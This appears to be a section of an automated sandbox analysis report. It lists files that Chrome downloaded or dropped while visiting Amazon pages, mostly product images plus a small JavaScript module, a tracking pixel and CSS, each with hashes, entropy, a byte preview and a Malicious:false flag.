                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!1..AQ."2a..#BRq....$3....STbr......C.......DU......................................................?..R..R..R..R..R..R..R..R..R..R..R..R..R..R..R..R..R..R..R..R..R..R..R..R..R..R..R..R..R..R..R..R..R..R..R..R.k:..iq.}(.......~$.x..,H...X.....b....I.XP......\..?H......o.FQe......J.8..7rB}....zW...._.!..y.H....N.|.$..a...`..W.3U.S..$.N....6.m.....0..0.*k.@.)@.)@.)@.....p......o.,..%t.H.}..FnP....[..1... .E.o.....Rda...w...<.#....`.%.v...SD.}...QO..+.. ...}....e.E........rv.......P"...H..MJ->bZ...\eTE4....q..C|.o.)J.JR.JR.JR.JR.JR.JTk.]..........`<...20.n.Px...R...yn.%Xa.r.;.U..Z!.c.7....&D..1.#p..L.<.0}...^@-......{.Eo.....c....,..h..>..Nl.Zk............><u..$Zq..W.3...].>2R2..c. ... ....j.{.....k....p... ,...*....5. |.).U.]....q..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):5068
                                                                                                                                                                                                                                                                Entropy (8bit):7.900288387108915
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:T6+W8CMz2A+T2FRb33r5gbjllEVe1PB9SPnmqXnPQ9B65PBumQD2ktypvbvII/:W+jCDlT2rn9Ill6e1KPnmqXnPQ9B6L0g
                                                                                                                                                                                                                                                                MD5:E405ED5CD8716785AB9F32308CBDA78B
                                                                                                                                                                                                                                                                SHA1:A1C599D01A0D6ACD90FC1BE282ABD416A15E86CC
                                                                                                                                                                                                                                                                SHA-256:4887456A2FF6038D489271FDD59B3FA403D9B364D5AA3F706C8EC13E84556F9C
                                                                                                                                                                                                                                                                SHA-512:E1B397815877E4BFCDF5EFC13A4908CA35DC99A8A245D25169C165B94FD86D7291798B922E125A521EF02AA7B2003381E82B98388A0ADF1F30B4040F89DF83E8
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/71tP2TMmkTL._AC_UL225_SR225,160_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!.1Q..A.."aq..2BRbr...#3S....Cs.D..................................................!.1"..2A..Qaqr..............?..hB......!./$....y.4.I....8.&..AA........?.l....]...S.M.'...H..kF.....*.4..B.K......@Pq:v;$......\.g...8|[.l...j..... *.c.>.B.Kd,......k[.......|.9.=K...4th.....k....."/tN...q..A..1.......N....I.d...7hM.....x......C}...y....1...2F7..FYW0?..~G!I..q.g.o.#..e...s...Q]nX...y5.>..[...A]Mp...^...@p.ZIs.p8M..:2.j.j~.Z.(...F.$.......0..{.;2/....|L....^.t..9... .).!...r.....F7.S....v....\#......XI..BT....L..9.hx......M......a..W.Fo..5..3.....!..$.. .!...B.B.... .!...B.Q7.M%.......=r.}5)e58..%....R.I..sO..x.?"..A..........V.7..$...#r.`.N.$..C\$......r.8.#.I.Fy.".r..re4/q+..J.+.......; ..^.... ).:[T.%....G..3...*..|L.k..C..k..tt...`.a
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 145x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):3947
                                                                                                                                                                                                                                                                Entropy (8bit):7.880130399098271
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0rm6J1qbdMxFyBycnuKW98T/owjqjcelV3f2B8d0v/3qYj4ye8svFmuaNtPucP:TMEU+yWZLTqte8+v/3qYDejNqhGWwLHk
                                                                                                                                                                                                                                                                MD5:1981E40984A2A7258D39AF758FE80E3C
                                                                                                                                                                                                                                                                SHA1:708E5C1329252F61A2655DB9D9161CFAEAB4F601
                                                                                                                                                                                                                                                                SHA-256:AE5A1DB70BAD4052B25E3B8B094B990B556DD820312FB08417D68BD2C5433A55
                                                                                                                                                                                                                                                                SHA-512:42A4EDE64F240716671E72162F3FE086F9BA7E6AA5ADB9B8273E6A20EE177E9000C49FBEAAC636590F07FEE2F021A5135702819E831F0F6CDF638B0C67CC6C94
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b07s96bn4y_379x304_ae-en._SY116_CB623271922_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!1A..."Qaq.....#2r.....BSs.....$%3CRbct.4................................................!1A2..............?..=[.I....1..-..t.m..Qj...*.A#,H.3f..L....s.]pr.P.m....4{....!....%..1.nm[.Nv.O.."L.j..%.P..z,..x!n......7......'.6...x.CkC.......S.t.....im.J.....2.@.#u.8.y.t....f...(.L.[0[i&N.....v..Z.(./Cv.IK..GN...g.z.l:..)Z....]eu.c..h...L[.J..`..':..[.......^d.!..7/.....s.*0U..n..aOJ.g.9.c..]...p...._>FY.-5@....-Og.&..t.SQm.I.k.H.)...2.>.......Y'.c../.....&...;R....+.m=$...{.yTE:\...S...mw..;Q..9....%.......N.?]Hm..?\.....GG.}i.d..d...y..+.../!.p.5zT.ZU.V}.~N.?F.uu.......,um.#0..=.+.%.......F.9.y..g..V...f.....O.....Yv.;u...6....B............5...3..Y..P........W.HQ....B..4....%A..yx.D...%./...=mt......-.........W.."1.$..Q.Ki..w*.W
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 132x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):6575
                                                                                                                                                                                                                                                                Entropy (8bit):7.937931622165854
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:3ehPoX+izeIEs11gMsTxooAbTFpFQFE7GeNog:3moX+izeC1gzlofJAFE7Gen
                                                                                                                                                                                                                                                                MD5:FB6C9BE7A7FB59334768EE5CAEA4A9AA
                                                                                                                                                                                                                                                                SHA1:84B13929928B6DD6568E2C1814D64B07CF7D645B
                                                                                                                                                                                                                                                                SHA-256:31BECC63B7FD239248EE66739AC0F9855A2A45F4A2084D8E840F061D765DC3D5
                                                                                                                                                                                                                                                                SHA-512:D4FE09D10AB2BB2CEBDFCE4BE73BDDC0E9459050891509D782DC12B30CE0DA53E32270A8490B21BC1B3599E4CEEFBF97AB19F9A9FA315C378BA33F65A6736CC0
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/61B0Z0Buu6L._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*...........".............................................................!1A..Q."2aq.R...#..Brt.&3Sb........$56C...................................................!...1QqAa.."2Bb......#.3cr...............?..iJ.....;wn`>.a..~.W..$./me"..3..9........0>.bz.A..9......7/..lT...S..J.J.w8[..]..o.7(y.......m3..C....X.B....{.8NF.R.&x}...9/..F.`.../...h..;}..-..@1.wn.. I#..=.YR..^...\..m.%w.6..v.$.Z..5.v.......DO.....%ip.k........m.Lr_........z.h../.U.s..@.7...(.9=.M.@......h...;xN=....:R.x.m...?.v..7...R....T.UbjA...nh>.....{....5gH....H.)$..r....I...8.1....L...P.&.Te.e..).T..0}9$n...-d.+.)............C.T.S.:'.*....%!.]..O+..!.!..%Lw..".$*L1.i..H... ...$..T.S...nPm._b%:...e..wI=..{.....Z..sl........I..0..+....Q.....^.q&...>...<..@&$.N.&k..I.Igq...)$...I.R.,.5.R.%)J..}.*.../.......C*..Z..........?.J.A.$....i6*.d.e4.a..P..I
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (501)
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):676
                                                                                                                                                                                                                                                                Entropy (8bit):5.171714767992367
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:2BZ/eqKDQM3ShtD34Z9DkkM8uN6FQQJewqDEZ6R8UNIkMVFLJl:2BZ/e3DZ3ShtDoZyaiIQQJixNITVFLJl
                                                                                                                                                                                                                                                                MD5:6E933965CAFAEC4DEFB36AB5E2AAD9A8
                                                                                                                                                                                                                                                                SHA1:8C240969FD002A6679BA28D10DB97280B8D16158
                                                                                                                                                                                                                                                                SHA-256:CA0541D6E2197B0686598AF9F0A2F55643E1451B1375AA2B9650169BC2E76521
                                                                                                                                                                                                                                                                SHA-512:B49F06AE8D0F77CB63167A62C5D9C5AF78D3C4B821F73CDF2A68C28E2F90A8CC68143AE483CD8598C525B7E4F05A33B3EA5D5077F72913ADAE69ADC30CA881A7
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:(function(e){var d=window.AmazonUIPageJS||window.P,f=d._namespace||d.attributeErrors,a=f?f("GenericObservableJS",""):d;a.guardFatal?a.guardFatal(e)(a,window):a.execute(function(){e(a,window)})})(function(e,d,f){e.register("generic-observable",function(){return function(){var a=this,g={};a.addObserver=function(b,a){g[b]=g[b]||[];g[b].push(a)};a.removeObserver=function(b,a){b=g[b]||[];for(var c=0;c<b.length;)b[c]===a?b.splice(c,1):c++};a.notifyObservers=function(){for(var b=arguments[0],d=[],c=0;c<.arguments.length;c++)d.push(arguments[c]);b=(g[b]||[]).slice(0);for(c=0;c<b.length;c++){var f=b[c];try{f.apply(a,d)}catch(h){e.execute(function(){throw h;})}}};return a}})});
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):3680
                                                                                                                                                                                                                                                                Entropy (8bit):7.859490397938555
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TNCHGaLsdh3YUiKaKqBsBywylUa6UjOpObjrrs:gsYUd3qBsMwylJa2g
                                                                                                                                                                                                                                                                MD5:61622BA5FD89DE9621F5A0AFFD03D031
                                                                                                                                                                                                                                                                SHA1:8F52CA0FA0AD57D7882CE5FC515D857BBF152068
                                                                                                                                                                                                                                                                SHA-256:BAD6A91B37BD6AF1F4B41B0CD3ACBA2E707FC01E50FA97145892E88ACF7876E9
                                                                                                                                                                                                                                                                SHA-512:CBD72B6B6FD610065A4B245A70D0F633CA332CA447D163ADFA3F9C5ECB5188BB0FE5AF46CC7B1D8BD4195B6648922A933D37AF0771EB419BD5C0DCD6E8036245
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."............................................................!..."1.AQq.#2Ra..3B.....r.$4....................................................!1...2q.."Aa..#3QR..............?.....)."!."!."!.'......0.....R'..|m.....V.......Ov./..................................MrhSN.G........@......T.....N%..v{B.Iz..d.....$.(.$...Z..^.V...k...F..a.c.......f.M....v..p..QVl...M.x....?...|S..R.=.B..&Cn.P.-......._.+kSMs"_..-.fB....y..P...Hl......f?.&nz<..]?..}V......DO.(."!."!."!."!."!."!."!."!.$.A.4.'.m......f.s.._........}...........&... ..[RG.@vT....6.%.fB.yV[....]..\.......G.QI%.M....,..C.'l.<...L.K..=(.eW..P.u......U.YC:..U..?18..U..]...a.......Gn..'R.IOcS.DBw.ib*.....r..h.?..Jb..:....p..j.1.p...|.>..q....D..M.EVX..........d.Z..P"^o.uU.5-..X.."V.K-.M..e...^9]..w9..gY.P..........T..0..c.E......x.S.....*.v..}..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):10830
                                                                                                                                                                                                                                                                Entropy (8bit):7.957579007404196
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:DRztyNOOx3vuRiDIb2YA9luC/EGUAK6FdT8ES6kqz3cwUH:DRzEx3GsIb2Yk/wT6LTtSccwc
                                                                                                                                                                                                                                                                MD5:ED2A86BE86D853C5DC200772F1A2E1AF
                                                                                                                                                                                                                                                                SHA1:DEAF3946C824D1371352C039C60566377E5A0D1B
                                                                                                                                                                                                                                                                SHA-256:410990DC7A862FA02E5999F92AC1635F20B7FD2266B24BE7134C07AA3C625EC2
                                                                                                                                                                                                                                                                SHA-512:7F93B2D1D57763C580BEB8CD6FFF721A7034D7B7F1ADC24DCCFFAA7097E9987CEC666D8F28604DA6BD350659FCE0B35B9C5D8644B97B6A41E5E7F454F3B6E9DD
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/71BqLrWjHEL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!.."1..AQ2aq#...BRU......$3CT....4b..Dru..................................................!.1Q..ARa.."2bq.Br...................?...;.|3]..f..Ey.N.;..".Ro.q.D....l$...x....!.9.-...<r,...P.nv.[`n.(......4.\..^.....{.Oq...TS..i0.$v1...l.:....>a./.3X2.p....{..s....(....`.0.....s.P......C{.[.b~...*_!.G.h...7i[B+.Yc.......B.U../.+.j..`(T<..p...H.Y..Xw.BU......"..X..E1.c8&.~..x.i.....Eg. ....,........,.q7.g<,..*m..YfGYb-.q...........e6i.,c..p............K'...S.......x..&....0....H.n.!gd{...."....t.+.0.....8[:.(3a.M.%.D.i.Ws.*#z...........<....3.I.....)..'....H..>..Li.(.bx.C..!..n..I...g...&}]...-M).@\.Q...oe,Q....e.-.al.y....7.R..f.7.8'8..f..]37.C!A.....'.2>.....:.6..U...T(u..'S....#U.qHd<q>M.e.h.fZ....G.....X).e..}..8..w.....D..T..j..6.`.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):71
                                                                                                                                                                                                                                                                Entropy (8bit):4.19644707821733
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:PouVIZxgRO5ZB1XbZ6iFi:haxUkZ3X96x
                                                                                                                                                                                                                                                                MD5:6AAEF67381946BFC1DDACCA8CF7F6C36
                                                                                                                                                                                                                                                                SHA1:E441BBA8B691AD0FFF0BCCB75974880018AB41D6
                                                                                                                                                                                                                                                                SHA-256:73F8AE8C11DAA6AD905107970E55C3C64CD7133561E9E91E650AAB092BA7245E
                                                                                                                                                                                                                                                                SHA-512:99039B90D4F3819EFB0A395D0DC810DEE1A56265D443D24D1C9BDF832EF9F95887E3C417253698A4F76EF176D0ACE6334905F4B7B4E6A8421D2F650B84255EC2
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://www.amazon.ae/rd/uedata?ld&v=0.294992.0&id=C37SFEY0GDXEZ5HDEVRN&sw=1280&sh=1024&vw=1263&vh=907&m=1&sc=C37SFEY0GDXEZ5HDEVRN&ue=6&bb=1312&ns=1335&ne=1376&be=1599&cf=3071&af=8717&fn=8717&fp=17513&fcp=17513&pc=41598&tc=-1188&na_=-1188&ul_=-1723469002998&_ul=-1723469002998&rd_=-1723469002998&_rd=-1723469002998&fe_=-1184&lk_=-1138&_lk=-1138&co_=-1138&_co=-366&sc_=-1097&rq_=-365&rs_=-36&_rs=505&dl_=-28&di_=1807&de_=1807&_de=1807&_dc=41575&ld_=41575&_ld=-1723469002998&ntd=-1&ty=0&rc=0&hob=4&hoe=6&ld=41599&t=1723469044597&ctb=1&rt=cf:14-1-4-7-2-0-1_af:44-1-5-33-5-0-1_ld:240-9-7-215-7-0-1&pty=Gateway&spty=desktop&pti=desktop&tid=C37SFEY0GDXEZ5HDEVRN&aftb=1&lob=1
                                                                                                                                                                                                                                                                Preview:<!DOCTYPE html><html><head><title>x</title></head><body></body></html>.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (8127)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):8176
                                                                                                                                                                                                                                                                Entropy (8bit):5.354303077210023
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:06ljerKZ8o6Z9ODdsd8HX02I2pNp7CpXLxJBEsE4LJTENV0sLR5NnjFARezY5+xH:0Df5dBE2gftF3YoCEXOVIsgAY
                                                                                                                                                                                                                                                                MD5:131871CE596EE77AA51129C134336F00
                                                                                                                                                                                                                                                                SHA1:9BE571424EA29C4EA834981098C3924B6C19453A
                                                                                                                                                                                                                                                                SHA-256:92C546D42EA275C73117FA125AF64A342BAC8E0E921EC11280861D905719BEB8
                                                                                                                                                                                                                                                                SHA-512:C60FBC5BB31A6ACAD2FDFF5BC366E83FC772493B43B49A4A9AA4F4AF213673BB0F04781134A6ACDF11456DF6841A705DCCD5FB0979A94F7E75C09A89D487EBE5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://url6.mailanyone.net/static/css/4.6f882ee5.chunk.css
                                                                                                                                                                                                                                                                Preview:.FloatingCircle_FloatingCircleContainer__13Pwx{height:0}.FloatingCircle_FloatingCircle__1mZQc,.FloatingCircle_FloatingCircleContainer__13Pwx{display:-webkit-flex;display:flex;-webkit-justify-content:center;justify-content:center}.FloatingCircle_FloatingCircle__1mZQc{position:relative;overflow:hidden;border-radius:50%;box-shadow:0 3px 6px rgba(0,0,0,.161);z-index:1}.FloatingCircle_FloatingCircle__MD__3w-8L{top:-2.333rem;height:4.666rem;width:4.666rem}.FloatingCircle_FloatingCircle__LG__2ewqP{top:-3rem;height:6rem;width:6rem}.FloatingCircle_FloatingCircle__Icon__3stnW{display:-webkit-flex;display:flex;-webkit-align-items:center;align-items:center}.FloatingCircle_FloatingCircle__Icon__MD__2UABm{font-size:2.333rem}.FloatingCircle_FloatingCircle__Icon__LG__3JGnf{font-size:3rem}.FloatingCircle_FloatingCircleDanger__3anuh{background-color:#f2d9d3}.FloatingCircle_FloatingCircleDanger__3anuh .FloatingCircle_FloatingCircle__Icon__3stnW{color:#ba2d0c}.FloatingCircle_FloatingCircleWarning__3JlQ0{b
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):22037
                                                                                                                                                                                                                                                                Entropy (8bit):7.9663750130993884
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:9JqLtBqZGKnLntMhA1MLqzI9FfvgldvYdkBty9/g8cVA939yhK6x+66/WG/vF6wb:9JcKGELtx1boXgnvZjw/g8EayvC40
                                                                                                                                                                                                                                                                MD5:D4B3FCA846D0ABD6DD1F2F47BEADD559
                                                                                                                                                                                                                                                                SHA1:763BD11535BE872B2CAB5DCD57730B2BF2759A12
                                                                                                                                                                                                                                                                SHA-256:985991D886B7BA22A85152CF5740F2E1526D5D2C12F46B46D591FFA40091C132
                                                                                                                                                                                                                                                                SHA-512:B1B9030961E4286A8001EA66B4F1184B20D3D244DEED97124D2624266A10C9AAF865CC535E93BFA2CF903219BB81F470D51D67907F1D815BE985F2EB037F0887
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://m.media-amazon.com/images/I/41tYpVlGR4L._SR480,440_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........3................................................................X....g.. .(..3.+6.9M*..-.....ET......x.c.c..h."...]..1.......2d..M...9G.:....}77.?O..)...:.f....P.@..A7...b.i.fyM.@.E....P.R..Q.....K......,.tp.0.$.H....1LG...\.V...gDAf.3b.1_..=.x.f...=...9z2S...y.......$c.h. ...m...L.T..Ve;p.....l.2.<...n..:(....B......D.0~.U.S..9e....j..|.t.7..1.....,u..H."..G.....)...t.8.C.9..........Z.Y.......@...?.(g..A....*..........P[...P...b....3...%....j.B:G:J&Z.F$.~...X..4Zfw..W*.`.Q=c.).....g.H.H..@...'...3A.......^ibfS.-.kH.:..k..:z..4T....J-.tK......s....9k.-g.........[^I.]X...,f.X.?>...........'...[e..b.....>w.t$....E.....F.U...v..X.....coI.cDL.H..i.N...>c.&1@.%....d.cP........jF&.!...X..De.fzn.d....[...1.}d&...FI....).<..O........W,p"\T.S.S.DB.kd~5.di...*T...2uN-uSo.F...d./i.u...Z...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 450x320, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):7551
                                                                                                                                                                                                                                                                Entropy (8bit):7.830462409522544
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TM2PYSqb4C0Wn/BLkw4TS1UtCTdbQGfPsZs1Lsr82tZGETKv3E8dNHXRfQxHIgt0:o2Tqb4bELkwgUT5QGH8rB7+wIgm
                                                                                                                                                                                                                                                                MD5:C6AD47C16C82CA87B991AAE3B59CCF52
                                                                                                                                                                                                                                                                SHA1:970CED3079A230625870C1D1A85A4B0200E02D36
                                                                                                                                                                                                                                                                SHA-256:517779F0358E261BBDF17339F4F84F988F26455E0CE31AF4D4B033240A98EF18
                                                                                                                                                                                                                                                                SHA-512:DFCDA718A30DC0D08BACD1E04D34D240F9064BF903E21B62DB0D191082A0F551FB68B4B47C93CD617A0EE63027660023DEBD7832127C8065F5C8A9785F954987
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/61gAO+Q1y5L._AC_UL450_SR450,320_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........0........................................................................)V....^...2#.O..J8...e[@..............0g..].8..[...H...vb.... *.f.L`uny.q.c ..............c.A..sP.{.l..8...%y.....2@cM4$.(..w.z(............q{?>1.ZK.|U.].q,.....8}(..n%.m..g.ESJ$......-.W................b.....5.9W..).n...7G.l..jO.....+.H.s..*G.o)..|.............<G..M..@..5m.5.Q...X.DQ..=..%Kx.&.MPU.\....^W~..9..9.............c1..)......C....q&.u.. .X.,Y..'.Gk&@rd.Z....:..u....f.{;.N .......1.z...dQ.5R}*.Vq_j.Mv4.M.L.OQ.....Wo...Q.(....M.;.3...^R.........\.J.......J.U.V..sf.7hO^hK...r...$.5I..R.L.....lE.Y).............T.z.j.......Z`.....>G.@B)yff.=m...d.E.n.I..............1F..*..8.mc....mK1&..~.......;T..P....&5$.................vi..V.u...6."...$X....A.W.b]B<@mY...GGzS..!................O9...:
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 450x320, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):25849
                                                                                                                                                                                                                                                                Entropy (8bit):7.958628106695266
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:rnJnEZTrnbltbvwByzLciVgsmQgznhYt7J+UzDN:BER/l6knbcQWhYt7bR
                                                                                                                                                                                                                                                                MD5:626AFE1B4C1A661DBD6356D66A6818A8
                                                                                                                                                                                                                                                                SHA1:E950DAF7C71AB2FE4094F87C6CAD3B6C304A186B
                                                                                                                                                                                                                                                                SHA-256:E8756119A246F9EA160B7FF86D95737BD17F63C575EB5BFC7C5088EAF9AB03DA
                                                                                                                                                                                                                                                                SHA-512:15389E467D9E657CA3AD07E09686CB1D81D9C825D9D41346B6B598EAF370EAC375AEC4C2EC14A2B1D363BDDDC4F966A2D7AD20C5792E8BDE0A8E61E310955825
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........5..................................................................,.............f{g..v.j..A.B .................(es.q...{..v...rwu.....E.I0.G.~...../..+...x.QJz.4...................L.^o...e.*`.;u..O..[...7..6.^.K.IN...3..h.....Q.^z.....~.|........<. ..........9...Q..a...:..@Y.Bg.....|57.|W..$..~...t.7e.....l'I.T...T.........pss.c,.......4.N9.\..;.?..sK\.'.jYvy..T.)T....0hzK-?..g.\W...f_C.OS.6zSk....~.f.c.F.)..8....X..|............0.3...H.N.t.NR./..im.].-Z[z..c..T...>._./...-.l..S.j#.j.>+..K...?ty_....T.O.'_;Y`....`.,.:.k..?.......@...N......~...l..4...*...jL.6[.e..&..R,..u........t..X-.b.t..R...9..,..=}/wF....G..Gm.nt.:e.7M..W&-)7..2....\..S...08n>...5...&./.g]....Y[E..+/4&......aH.m...K....1i........tWB..9-.....X...#a...+...^E.c.?..N.'.u.....P...n-.&.....mb....).....B.|
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 100x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):8260
                                                                                                                                                                                                                                                                Entropy (8bit):7.954769523438986
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:ySLIzpRkGYR1olv6XM1bBQ35z8Z/BUiLw7W+MVx8ML:vLI1RkGYR18Bqz8/UiLw7W738ML
                                                                                                                                                                                                                                                                MD5:987B1233FF5A8B1321F05CB5EE6DA762
                                                                                                                                                                                                                                                                SHA1:EAAE3D962F537ACDB254E36495F0F625E4B4B51E
                                                                                                                                                                                                                                                                SHA-256:1A1473EED5C920D99E083E494E79C91DA165AAFED41BD27A5F551015DDB7BE46
                                                                                                                                                                                                                                                                SHA-512:5B6E3EC87620A7FB8079E0E60521788469940E519A4DA11D7D6872C34D2A873412AACD1D9F38B97B0105F9FAE31415B5C00336BA94510F25CF02C4EB4EB09B80
                                                                                                                                                                                                                                                                Malicious:false
